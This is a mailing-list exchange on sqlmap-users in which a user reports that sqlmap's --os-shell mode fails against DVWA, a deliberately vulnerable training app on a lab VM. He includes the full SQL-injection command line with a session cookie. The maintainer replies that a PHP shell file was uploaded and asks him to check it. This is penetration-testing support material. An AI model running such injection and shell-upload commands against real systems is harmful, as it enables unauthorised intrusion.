hi Ahmed. from the traffic file you've sent to me it seems that php shell was indeed uploaded in request #21 but for some reason nothing was returned in validation request #22.
could you please: 1) check what do you get in web browser with: http://172.16.171.134:80/hackable/uploads/tmpupgiv.php 2) check inside the virtual machine itself what's the content of that file there (./hackable/uploads/tmpupgiv.php) Kind regards On Mon, Sep 5, 2011 at 12:02 PM, Ahmed Shawky <ah...@isecur1ty.org> wrote: > > while testing sqlmap against DVWA I noticed it doesn't work like expected > while using --os-shell > ./sqlmap.py -u > "http://172.16.171.134/vulnerabilities/sqli/?id=test&Submit=Submit"; -p id > --dbms mysql --technique US --union-col 2 --suffix "#" --prefix "'" --cookie > "PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low" --os-shell -v3 -t > /home/lnxg33k/Desktop/dvwa.txt --flush-session > > -- > > Ahmed Shawky El-Antry > lnxg33k owner "http://lnxg33k.wordpress.com"; > Isecur1ty team member"http://www.isecur1ty.org"; > Twitter @lnxg33k > > ------------------------------------------------------------------------------ > Special Offer -- Download ArcSight Logger for FREE! > Finally, a world-class log management solution at an even better > price-free! And you'll get a free "Love Thy Logs" t-shirt when you > download Logger. Secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsisghtdev2dev > _______________________________________________ > sqlmap-users mailing list > sqlmap-users@lists.sourceforge.net > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm ------------------------------------------------------------------------------ Special Offer -- Download ArcSight Logger for FREE! Finally, a world-class log management solution at an even better price-free! And you'll get a free "Love Thy Logs" t-shirt when you download Logger. Secure your free ArcSight Logger TODAY! http://p.sf.net/sfu/arcsisghtdev2dev _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
